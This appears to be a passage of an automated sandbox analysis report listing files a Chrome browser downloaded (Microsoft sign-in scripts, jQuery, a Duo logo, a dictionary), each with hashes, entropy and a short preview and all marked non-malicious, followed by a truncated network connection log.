                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlR4k3o23bt4xIFDeeNQA4SBQ3OQUx6?alt=proto
                                                                                                                                          Preview:CkcKDQ3njUAOGgQIVhgCIAEKNg3OQUx6GgQISxgCKikIClIlChtAISQjKi5fLSUmKz8sKV49KDo7Wz4vXTwnflwQARj/////Dw==
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (2003)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):2976
                                                                                                                                          Entropy (8bit):5.331937284769462
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:vxVPjDltOMSBkjGWfT58STi1srOGM4xufaJ7mevwxnjs2XQamsJoXk+Ax42CcuKq:jPjDXOMS1WfDi1Z40faJ7mevwxnjXg73
                                                                                                                                          MD5:AF91917885AAE55D96914A09AB4F6E68
                                                                                                                                          SHA1:D3E84133F4445404DB6F3133C4568A7AC1F7B58D
                                                                                                                                          SHA-256:EE23DA6E558D1AE67B072B921BB57E2C49DE10DCF6F1A6F7E1D9146DDAE5BAAB
                                                                                                                                          SHA-512:86630D55789E4B7146E25044C4CC95CE817B3084A8A0F14FFF98BCEBABED42D2D871F74A20B7B752CB27FEAC9CC6F1CBA752BDCB368D0F0750239ED507031F32
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pidpredirect_e74b7f721910c56d695c.js
                                                                                                                                          Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[20],{508:function(e,t,i
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (32009)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):57443
                                                                                                                                          Entropy (8bit):5.372940573746363
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:ABqF1tlfretkF7IKbVaqDRx3D7ym+d/Px25+1wtvGixn/TPRUbx3VDg/MvA5Gl:ABrkF7IyJz7ym+d/Po5+1wtvGiJig/Ml
                                                                                                                                          MD5:D580777BB3A28B94F6F1D18EE17AEDA3
                                                                                                                                          SHA1:E78833A2DB1AA97DA3F4A1994E6AF1F0D74D7CC7
                                                                                                                                          SHA-256:81188E8A76162C79DB4A5C10AC933C9E874C5B9EAE10E47956AD9DF704E01B28
                                                                                                                                          SHA-512:E3F5FFE3E7E54A7D640DF3BC06D336C9F936635D2594159B3EA5EDAEFBA6D6774060A532E0CBE0664FDC65806BD53E9BFC19C11F7946A5E157A9EC935C564378
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_1yb3e7oii5t28dgo4xrtow2.js
                                                                                                                                          Preview:!function(e){function o(n){if(i[n])return i[n].exports;var t=i[n]={exports:{},id:n,loaded:!1};return e[n].call(t.exports,t,t.exports,o),t.loaded=!0,t.exports}var i={};return o.m=e,o.c=i,o.p="",o(0)}([function(e,o,i){i(2);var n=i(1),t=i(5),r=i(6),a=r.StringsVariantId,s=r.AllowedIdentitiesType;n.registerSource("str",function(e,o){if(e.WF_STR_SignupLink_AriaLabel_Text="Create a Microsoft account",e.WF_STR_SignupLink_AriaLabel_Generic_Text="Create a new account",e.CT_STR_CookieBanner_Link_AriaLabel="Learn more about Microsoft's Cookie Policy",e.WF_STR_HeaderDefault_Title=o.iLoginStringsVariantId===a.CombinedSigninSignupV2WelcomeTitle?"Welcome":"Sign in",e.STR_Footer_IcpLicense_Text=".ICP.13015306.-10",o.oAppCobranding&&o.oAppCobranding.friendlyAppName){var i=o.fBreakBrandingSigninString?"to continue to {0}":"Continue to {0}";e.WF_STR_App_Title=t.format(i,o.oAppCobranding.friendlyAppName)}switch(o.oAppCobranding&&o.oAppCobranding.signinDescription&&(e.WF_STR_Default_Desc=o.oAppCobrand
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):89501
                                                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):190152
                                                                                                                                          Entropy (8bit):5.348678574819375
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:0+mTq9mTuZEOHEXp6WXWkYVlMBMwMlJNbdffVv6GhL+rUWxa:STekBWkYVdLlJNbr6m+rUGa
                                                                                                                                          MD5:4877EFC88055D60953886EC55B04DE34
                                                                                                                                          SHA1:2341B026A3E2A3B01AFA1A39D1706840D75E09B3
                                                                                                                                          SHA-256:8405362EB8F09DF13AE244DE155B51B1577274673D9728B6C81CD0278A63C8B0
                                                                                                                                          SHA-512:625844EDC37594D5C2F7622BD1B59278BF68ABB2FA22476C56826433C961C7B1924858A7588F8B6284D3C5AC8738ECB895EEC949DE18667A98C04A59CB03DAC0
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:(window.telemetry_webpackJsonp=window.telemetry_webpackJsonp||[]).push([[2],[,,,function(e,t,n){"use strict";n.r(t),n.d(t,"ValueKind",(function(){return r.e})),n.d(t,"EventLatency",(function(){return r.a})),n.d(t,"EventPersistence",(function(){return r.b})),n.d(t,"TraceLevel",(function(){return r.d})),n.d(t,"AppInsightsCore",(function(){return i.a})),n.d(t,"BaseCore",(function(){return d})),n.d(t,"_ExtendedInternalMessageId",(function(){return r.f})),n.d(t,"EventPropertyType",(function(){return r.c})),n.d(t,"ESPromise",(function(){return g})),n.d(t,"ESPromiseScheduler",(function(){return C})),n.d(t,"ValueSanitizer",(function(){return I})),n.d(t,"NotificationManager",(function(){return E.a})),n.d(t,"BaseTelemetryPlugin",(function(){return S.a})),n.d(t,"ProcessTelemetryContext",(function(){return N.a})),n.d(t,"MinChannelPriorty",(function(){return w.a})),n.d(t,"EventsDiscardedReason",(function(){return P.a})),n.d(t,"DiagnosticLogger",(function(){return c.a})),n.d(t,"LoggingSeverity",(fun
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):451968
                                                                                                                                          Entropy (8bit):5.0102415404165095
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:CHZsTLG/6lu8riHP1qmOeMlh+ebMiCB64or:EZmiv1ClhhA6d
                                                                                                                                          MD5:4604E676A0A7D18770853919E24EC465
                                                                                                                                          SHA1:415EF3B2CA0851E00EBAF0D6C9F6213C561AC98F
                                                                                                                                          SHA-256:A075B01D9B015C616511A9E87DA77DA3D9881621DB32F584E4606DDABF1C1100
                                                                                                                                          SHA-512:3D89C21F20772A8BEBDB70B29C42FCA2F6BFFCDA49DFF9D5644F3F3910B7C710A5C20154A7AF5134C9C7A8624A1251B5E56CED9351D87463F31BED8188EB0774
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:"https://r3---sn-q4fzen7l.gvt1.com/edgedl/chrome/dict/en-us-10-1.bdic?cms_redirect=yes&met=1731908910,&mh=7g&mip=155.94.241.187&mm=28&mn=sn-q4fzen7l&ms=nvh&mt=1731907870&mv=u&mvi=3&pl=24&rmhost=r1---sn-q4fzen7l.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r3---sn-q4flrnek.gvt1.com"
                                                                                                                                          Preview:BDic.... ....6..._..$.......iy.2...t/...3...5....AF 1362.AF nm.AF pt.AF n1.AF p.AF tc.AF SM.AF M.AF S.AF MS.AF MNR.AF GDS.AF MNT.AF MH.AF MR.AF SZMR.AF MJ.AF MT.AF MY.AF MRZ.AF MN.AF MG.AF RM.AF N.AF MV.AF XM.AF DSM.AF SD.AF G.AF R.AF MNX.AF MRS.AF MD.AF MNRB.AF B.AF ZSMR.AF PM.AF SMNGJ.AF SMN.AF ZMR.AF SMGB.AF MZR.AF GM.AF SMR.AF SMDG.AF RMZ.AF ZM.AF MDG.AF MDT.AF SMNXT.AF SDY.AF LSDG.AF LGDS.AF GLDS.AF UY.AF U.AF DSGNX.AF GNDSX.AF DSG.AF Y.AF GS.AF IEMS.AF YP.AF ZGDRS.AF XGNVDS.AF UT.AF GNDS.AF GVDS.AF MYPS.AF XGNDS.AF TPRY.AF MDSG.AF ZGSDR.AF DYSG.AF PMYTNS.AF AGDS.AF DRZGS.AF PY.AF GSPMDY.AF EGVDS.AF SL.AF GNXDS.AF DSBG.AF IM.AF I.AF MDGS.AF SMY.AF DSGN.AF DSLG.AF GMDS.AF MDSBG.AF SGD.AF IY.AF P.AF DSMG.AF BLZGDRS.AF TR.AF AGSD.AF ZGBDRSL.AF PTRY.AF ASDGV.AF ASM.AF ICANGSD.AF ICAM.AF IKY.AF AMS.AF PMYTRS.AF BZGVDRS.AF SDRBZG.AF GVMDS.AF PSM.AF DGLS.AF GNVXDS.AF AGDSL.AF DGS.AF XDSGNV.AF BZGDRS.AF AM.AF AS.AF A.AF LDSG.AF AGVDS.AF SDG.AF LDSMG.AF EDSMG.AF EY.AF DRSMZG.AF PRYT.AF LZ
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:PNG image data, 228 x 144, 8-bit/color RGBA, non-interlaced
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):7471
                                                                                                                                          Entropy (8bit):7.9480479184971395
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:xgFDhiIpMUtuEz7TxZncggzMxs16XJaCAW8B:qDK9Ezrncgg0s4kCAt
                                                                                                                                          MD5:9D4E6BED02B3B8860E0AA48B39A37B31
                                                                                                                                          SHA1:3085F5A15D65BD31DE006158F9330BB5F0FC9B39
                                                                                                                                          SHA-256:0F39D23CE00429A5BEBEA85E8446CCE2565178C40D332BF9252B9E1EB1B75B35
                                                                                                                                          SHA-512:619599628C1CDCBB899545828B08CDA712CCC7D671242391A6BD575396F6A3538DAC9B231FE0EC275B2339709F8C96EAE5492D26AD3B6C71B70332DD36C370B4
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://ux-asset-commercial.duosecurity.com/customization/account/pjr5mk7gIVVM96clMnJeaB_2v7s7l9mi0IW7F6yfzFw/logo_image.png?versionId=DzI1NMCJNJv6J3By1BhKLYgM8B5W6KuR
                                                                                                                                          Preview:.PNG........IHDR................Z....pHYs..!8..!8.E.1`....sRGB.........gAMA......a.....IDATx...|T.......!dg..B].O.D.$.T.}*.U...O.Z.5.[....Z..j+..*k0 .(.T-..H2Y..f.....N@.@.,w....~.a.s..w..?..0..0..0..0..0..0..0..0..0..0..$....u.h/+@.....!kG#.....>...5.....NM..:..FTU.8.H.AV....PJW.|..)..0.Ge...!.$.%.oR.9.LHq5}r*]Yt5R..HY..T..G...\.t.4.qH...w.~.{-&...LrQb|....B..}2..W..2f`.. .I_A.P...\..};..TS.....0.c.....+...(G....4......HS4.+.q$L1e..d.tm.......`...1*../..4&}.ih. d..2..8%.E....p.C..p.1.+HP...B..I.*..5..?Z...!...0....a\...a\...a\...a\...a\...a\...a\...a\...a\...a\...a\...fS&.q...1... .Wa......M..0.S..Na:.>..R.@....v .Q..W...[...3....@`..@.&.LMS(5..PK.....t..$B....<...(.!$...r.. ..;...$.......K.i....9*.>D..RC)...H.gS.."^...D..j..Eyq.R..qxa.hx....DJ&a..4'S..!........J.G..^?....8a..RN..}....J.;(.>G.I|.....~..1..x..`E.`.....$>...(.$...wa..@..j.-!....z7.}Z...Cf^CnS...\......8o.1..S.*l.H...du}.. .........=..D...p..i.E}~1|uv6.et.6R:......4.F...H..R
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (14782)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):15755
                                                                                                                                          Entropy (8bit):5.366543080044668
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:DveX/4OSgcn2ZU2ZfeXOh+rF3X1qDZD4zfXdv79HU:q/9i57hU
                                                                                                                                          MD5:630831903F4BA9060856520624E34CFC
                                                                                                                                          SHA1:36DC15B9CCC3FC8EF627354BF55EF44EBD10E203
                                                                                                                                          SHA-256:BC6804D058D5BD5B24FC04E479FC8973BEF5D3EFEAFAA9C19C60A009BF0FAC0B
                                                                                                                                          SHA-512:1B0759972BBAB0B1A11D54849051E6782600B74FADB1CAF1BD58D214F484E35154907CA7F396EDB1C81A7CDC6F264D138267FB58FD89E1BA3A4D67366EE7E8B0
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[17],{519:function(e,n,s
                                                                                                                                          No static file info
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Nov 18, 2024 06:47:14.583483934 CET49673443192.168.2.16204.79.197.203
                                                                                                                                          Nov 18, 2024 06:47:14.885989904 CET49673443192.168.2.16204.79.197.203
                                                                                                                                          Nov 18, 2024 06:47:15.492003918 CET49673443192.168.2.16204.79.197.203
                                                                                                                                          Nov 18, 2024 06:47:16.704997063 CET49673443192.168.2.16204.79.197.203
                                                                                                                                          Nov 18, 2024 06:47:17.837332964 CET4968980192.168.2.16192.229.211.108
                                                                                                                                          Nov 18, 2024 06:47:18.824537992 CET49704443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:18.824570894 CET44349704142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:18.824632883 CET49704443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:18.824996948 CET49705443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:18.825047016 CET44349705142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:18.825119972 CET49705443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:18.825257063 CET49704443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:18.825273991 CET44349704142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:18.825503111 CET49705443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:18.825520039 CET44349705142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:19.111020088 CET49673443192.168.2.16204.79.197.203
                                                                                                                                          Nov 18, 2024 06:47:19.681071043 CET44349705142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:19.681433916 CET49705443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:19.681449890 CET44349705142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:19.682923079 CET44349705142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:19.683027029 CET49705443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:19.684320927 CET49705443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:19.684411049 CET44349705142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:19.684487104 CET49705443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:19.684494019 CET44349705142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:19.706355095 CET44349704142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:19.706737995 CET49704443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:19.706768990 CET44349704142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:19.710239887 CET44349704142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:19.710330009 CET49704443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:19.710598946 CET49704443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:19.710680008 CET44349704142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:19.732533932 CET49705443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:19.764799118 CET49704443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:19.764827013 CET44349704142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:19.812021017 CET49704443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:19.946664095 CET44349705142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:20.002038956 CET49705443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:20.002057076 CET44349705142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:20.002844095 CET49705443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:20.002908945 CET44349705142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:20.003042936 CET49705443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:20.004863977 CET49704443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:20.047354937 CET44349704142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:20.289623022 CET44349704142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:20.290218115 CET49704443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:20.290258884 CET44349704142.250.186.131192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:20.290338993 CET49704443192.168.2.16142.250.186.131
                                                                                                                                          Nov 18, 2024 06:47:21.468210936 CET4970880192.168.2.16192.185.150.174
                                                                                                                                          Nov 18, 2024 06:47:21.473558903 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:21.473680019 CET4970880192.168.2.16192.185.150.174
                                                                                                                                          Nov 18, 2024 06:47:21.473875046 CET4970880192.168.2.16192.185.150.174
                                                                                                                                          Nov 18, 2024 06:47:21.478763103 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.237104893 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.237163067 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.237200975 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.237518072 CET4970880192.168.2.16192.185.150.174
                                                                                                                                          Nov 18, 2024 06:47:22.237734079 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.237770081 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.237799883 CET4970880192.168.2.16192.185.150.174
                                                                                                                                          Nov 18, 2024 06:47:22.237804890 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.237862110 CET4970880192.168.2.16192.185.150.174
                                                                                                                                          Nov 18, 2024 06:47:22.238571882 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.238606930 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.238641977 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.238651991 CET4970880192.168.2.16192.185.150.174
                                                                                                                                          Nov 18, 2024 06:47:22.239358902 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.239394903 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.239433050 CET4970880192.168.2.16192.185.150.174
                                                                                                                                          Nov 18, 2024 06:47:22.295137882 CET4970880192.168.2.16192.185.150.174
                                                                                                                                          Nov 18, 2024 06:47:22.464626074 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.464819908 CET4970880192.168.2.16192.185.150.174
                                                                                                                                          Nov 18, 2024 06:47:22.464962006 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.465095997 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.465133905 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.465167046 CET4970880192.168.2.16192.185.150.174
                                                                                                                                          Nov 18, 2024 06:47:22.465621948 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.465658903 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.465696096 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.465701103 CET4970880192.168.2.16192.185.150.174
                                                                                                                                          Nov 18, 2024 06:47:22.465749025 CET4970880192.168.2.16192.185.150.174
                                                                                                                                          Nov 18, 2024 06:47:22.466377020 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.466413021 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.466479063 CET4970880192.168.2.16192.185.150.174
                                                                                                                                          Nov 18, 2024 06:47:22.466809034 CET8049708192.185.150.174192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.504848003 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:22.504934072 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.505048037 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:22.505347967 CET49710443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:47:22.505450964 CET44349710142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.505538940 CET49710443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:47:22.505743980 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:22.505779982 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.506030083 CET49710443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:47:22.506063938 CET44349710142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.506357908 CET49711443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:22.506381989 CET44349711188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.506453037 CET49711443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:22.506674051 CET49711443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:22.506695986 CET44349711188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.516072035 CET4970880192.168.2.16192.185.150.174
                                                                                                                                          Nov 18, 2024 06:47:22.753583908 CET49678443192.168.2.1620.189.173.10
                                                                                                                                          Nov 18, 2024 06:47:22.766340971 CET49712443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:22.766386986 CET44349712184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:22.766478062 CET49712443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:22.780448914 CET49712443192.168.2.16184.28.90.27
                                                                                                                                          Nov 18, 2024 06:47:22.780525923 CET44349712184.28.90.27192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.054096937 CET49678443192.168.2.1620.189.173.10
                                                                                                                                          Nov 18, 2024 06:47:23.121882915 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.122317076 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.122378111 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.124032974 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.124144077 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.124989033 CET44349711188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.125257969 CET49711443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.125273943 CET44349711188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.125456095 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.125652075 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.125663042 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.125727892 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.126790047 CET44349711188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.126873016 CET49711443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.127814054 CET49711443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.127897024 CET44349711188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.179040909 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.179100990 CET44349709188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.179208994 CET49711443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.179223061 CET44349711188.114.96.3192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.225044966 CET49709443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.225045919 CET49711443192.168.2.16188.114.96.3
                                                                                                                                          Nov 18, 2024 06:47:23.281080008 CET5511753192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:23.286138058 CET53551171.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.286232948 CET5511753192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:23.286268950 CET5511753192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:47:23.291116953 CET53551171.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.368726015 CET44349710142.250.186.132192.168.2.16
                                                                                                                                          Nov 18, 2024 06:47:23.369152069 CET49710443192.168.2.16142.250.186.132
                                                                                                                                          Nov 18, 2024 06:47:23.369209051 CET44349710142.250.186.132192.168.2.16
